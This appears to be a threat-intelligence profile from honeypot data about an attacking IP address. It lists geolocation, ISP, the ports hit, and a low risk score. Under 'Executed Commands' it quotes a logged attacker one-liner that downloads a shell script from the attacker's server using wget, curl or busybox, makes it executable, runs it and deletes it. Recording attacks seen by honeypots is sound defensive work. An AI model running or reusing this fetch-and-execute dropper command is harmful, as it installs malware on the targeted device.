TROYANOSYVIRUS
Active Threat β€’ LOW

31.56.144.12

First Detection4/25/2026
Last Activity4/25/2026
ISPStarLight Network, Inc.
🎯
11
Total Attacks
πŸ”Œ
2
Ports
πŸ“‘
2
Attack Types
🦠
0
Malware

Geolocation

Country
πŸ‡ΊπŸ‡Έ United States
City
Reston
ASN
AS214828
ISP
StarLight Network, Inc.

Attack Types

ssh_telnet_honeypot
adb_honeypot

Attacked Ports

235555

Associated Malware

No associated malware

Executed Commands

$cd /data/local/tmp || cd /sdcard || cd /data/tmp || cd /mnt/sdcard; (wget http://31.56.144.12/cat.sh -O cat.sh || curl -O http://31.56.144.12/cat.sh || busybox wget http://31.56.144.12/cat.sh -O cat.sh); chmod 777 cat.sh; sh cat.sh; rm -rf cat.sh3x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Risk Assessment

25
/100
LowMediumHighCritical